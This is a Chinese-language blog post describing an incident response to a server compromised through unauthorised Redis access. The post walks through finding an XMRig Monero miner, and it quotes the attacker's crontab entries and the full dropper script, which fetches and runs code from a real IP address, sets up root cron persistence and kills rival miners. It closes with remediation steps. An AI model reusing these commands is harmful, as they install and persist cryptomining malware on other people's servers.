服务器被植入挖矿程序

November 07, 2017 · 9 mins read

服务器被植入挖矿程序

事件简介

服务器遭遇入侵,入侵者通过 Redis 未授权访问缺陷,植入挖矿程序

起因

Redis 未授权访问缺陷可轻易导致系统被黑

经过

执行 htop 发现异常进程

1__deployer_VM-117-230-ubuntu___var_lib_postgresql_9_3_main__ssh_.png

查看异常进程信息 sudo ls -al /proc/25461

dr-xr-xr-x   9 deployer postgres 0 Nov  6 13:15 .
dr-xr-xr-x 193 root     root     0 Aug 19 12:05 ..
dr-xr-xr-x   2 deployer postgres 0 Nov  6 13:15 attr
-rw-r--r--   1 deployer postgres 0 Nov  6 13:15 autogroup
-r--------   1 deployer postgres 0 Nov  6 13:15 auxv
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 cgroup
--w-------   1 deployer postgres 0 Nov  6 13:15 clear_refs
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 cmdline
-rw-r--r--   1 deployer postgres 0 Nov  6 13:15 comm
-rw-r--r--   1 deployer postgres 0 Nov  6 13:15 coredump_filter
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 cpuset
lrwxrwxrwx   1 deployer postgres 0 Nov  6 13:15 cwd -> /
-r--------   1 deployer postgres 0 Nov  6 13:15 environ
lrwxrwxrwx   1 deployer postgres 0 Nov  6 13:15 exe -> /var/lib/postgresql/9.3/main/x3776026004
dr-x------   2 deployer postgres 0 Nov  6 13:15 fd
dr-x------   2 deployer postgres 0 Nov  6 13:15 fdinfo
-rw-r--r--   1 deployer postgres 0 Nov  6 13:15 gid_map
-r--------   1 deployer postgres 0 Nov  6 13:15 io
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 latency
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 limits
-rw-r--r--   1 deployer postgres 0 Nov  6 13:15 loginuid
dr-x------   2 deployer postgres 0 Nov  6 13:15 map_files
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 maps
-rw-------   1 deployer postgres 0 Nov  6 13:15 mem
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 mountinfo
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 mounts
-r--------   1 deployer postgres 0 Nov  6 13:15 mountstats
dr-xr-xr-x   5 deployer postgres 0 Nov  6 13:15 net
dr-x--x--x   2 deployer postgres 0 Nov  6 13:15 ns
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 numa_maps
-rw-r--r--   1 deployer postgres 0 Nov  6 13:15 oom_adj
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 oom_score
-rw-r--r--   1 deployer postgres 0 Nov  6 13:15 oom_score_adj
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 pagemap
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 personality
-rw-r--r--   1 deployer postgres 0 Nov  6 13:15 projid_map
lrwxrwxrwx   1 deployer postgres 0 Nov  6 13:15 root -> /
-rw-r--r--   1 deployer postgres 0 Nov  6 13:15 sched
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 schedstat
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 sessionid
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 smaps
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 stack
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 stat
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 statm
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 status
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 syscall
dr-xr-xr-x  13 deployer postgres 0 Nov  6 13:15 task
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 timers
-rw-r--r--   1 deployer postgres 0 Nov  6 13:15 uid_map
-r--r--r--   1 deployer postgres 0 Nov  6 13:15 wchan

发现异常进程exe -> /var/lib/postgresql/9.3/main/x3776026004 查看 pg 目录 /var/lib/postgresql/9.3/main

drwx------ 15 deployer postgres    4096 Oct 23 04:33 ./
drwxr-xr-x  3 deployer postgres    4096 Aug 16  2016 ../
drwx------  6 deployer postgres    4096 Aug 30 17:53 base/
drwx------  2 deployer postgres    4096 Sep  5 16:08 global/
drwx------  2 deployer postgres    4096 Aug 16  2016 pg_clog/
drwx------  4 deployer postgres    4096 Aug 16  2016 pg_multixact/
drwx------  2 deployer postgres    4096 Aug 30 18:13 pg_notify/
drwx------  2 deployer postgres    4096 Aug 16  2016 pg_serial/
drwx------  2 deployer postgres    4096 Aug 16  2016 pg_snapshots/
drwx------  2 deployer postgres    4096 Aug 30 18:13 pg_stat/
drwx------  2 deployer postgres    4096 Nov  6 12:19 pg_stat_tmp/
drwx------  2 deployer postgres    4096 Aug 16  2016 pg_subtrans/
drwx------  2 deployer postgres    4096 Aug 16  2016 pg_tblspc/
drwx------  2 deployer postgres    4096 Aug 16  2016 pg_twophase/
-rw-------  1 deployer postgres       4 Aug 16  2016 PG_VERSION
drwx------  3 deployer postgres    4096 Aug 16  2016 pg_xlog/
-rw-------  1 deployer postgres     133 Aug 30 18:13 postmaster.opts
-rw-------  1 deployer postgres      93 Aug 30 18:13 postmaster.pid
-rwxrwxrwx  1 deployer postgres   14480 Oct 13 10:06 ps3767604655*
-rw-r--r--  1 deployer postgres   15360 Oct 12 03:58 vcredist_x64_1130.dll
-rw-r--r--  1 deployer postgres  100352 Oct 13 04:52 vcredist_x64_2191.dll
-rw-r--r--  1 deployer postgres   15360 Oct 12 08:50 vcredist_x64_5569.dll
-rw-r--r--  1 deployer postgres  100352 Oct 23 04:33 vcredist_x64_6375.dll
-rw-r--r--  1 deployer postgres  100352 Oct 16 05:12 vcredist_x64_8544.dll
-rw-r--r--  1 deployer postgres   11264 Oct 12 03:58 vcredist_x86_1071.dll
-rw-r--r--  1 deployer postgres   11264 Oct 12 08:50 vcredist_x86_5380.dll
-rw-r--r--  1 deployer postgres   81408 Oct 23 04:33 vcredist_x86_7537.dll
-rw-r--r--  1 deployer postgres   81408 Oct 13 04:52 vcredist_x86_9105.dll
-rw-r--r--  1 deployer postgres   81408 Oct 16 05:12 vcredist_x86_928.dll
-rwxrwxrwx  1 deployer postgres  496464 Oct 13 10:06 x3776026004*
-rw-------  1 deployer postgres 4676439 Nov  6 12:19 xmr.txt

恶意程序(x3776026004)植入时间为 2017年10月13号10:06分

查看 xmr.txt 文件

[2017-10-13 10:06:31]  * VERSIONS:     XMRig/2.3.1-dev libuv/1.9.1 gcc/6.3.0
[2017-10-13 10:06:31]  * HUGE PAGES:   available, disabled
[2017-10-13 10:06:31]  * CPU:          Intel(R) Xeon(R) CPU E5-26xx v3 (1) x64 AES-NI
[2017-10-13 10:06:31]  * CPU L2/L3:    24.0 MB/0.0 MB
[2017-10-13 10:06:31]  * THREADS:      6, cryptonight, av=1, donate=0%
[2017-10-13 10:06:31]  * POOL #1:      xmr.crypto-pool.fr:80
[2017-10-13 10:06:31]  * COMMANDS:     'h' hashrate, 'p' pause, 'r' resume
[2017-10-13 10:06:31] use pool xmr.crypto-pool.fr:80 163.172.226.114
[2017-10-13 10:06:31] new job from xmr.crypto-pool.fr:80 diff 50000
[2017-10-13 10:06:37] new job from xmr.crypto-pool.fr:80 diff 50000
[2017-10-13 10:06:47] new job from xmr.crypto-pool.fr:80 diff 50000

访问地址 xmr.crypto-pool.fr

xmr_crypto-pool_fr

这个恶意程序为一个是挖矿程序

检查 /var/spool/cron/crontabs/ 发现有定时任务执行

*/1 * * * * curl -L http://218.248.40.228:8443/i.sh | sh
*/1 * * * * wget -q http://218.248.40.228:8443/i.sh -O - | sh

恶意代码如下

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddg.2020" ]; then
    curl -fsSL http://218.248.40.228:8443/2020/ddg.$(uname -m) -o /tmp/ddg.2020
fi
if [ ! -f "/tmp/ddg.2020" ]; then
    wget -q http://218.248.40.228:8443/2020/ddg.$(uname -m) -O /tmp/ddg.2020
fi
chmod +x /tmp/ddg.2020 && /tmp/ddg.2020
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

解决方法

  1. 关闭访问挖矿服务器的访问 iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
  2. 检查 crontab 中的定时任务,删除恶意定时任务
  3. 杀掉挖矿程序,并清除恶意程序
  4. 配置 bind 选项, 限定可以连接 Redis 服务器的 IP, 并修改 redis 的默认端口6379, 配置rename-command 配置项
  5. 查找 /tmp 目录是否有发现可以文件,找到并且清除
  6. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
  7. 所有操作完成之后,记得再次使用 htop 观察一段时间,确保挖矿守护进程已经干掉,挖矿程序没有重新启动服务

参考链接

  • http://www.chinaz.com/server/2015/1112/469670.shtml
  • http://53cto.blog.51cto.com/9899631/1826989
← Previous Post Next Post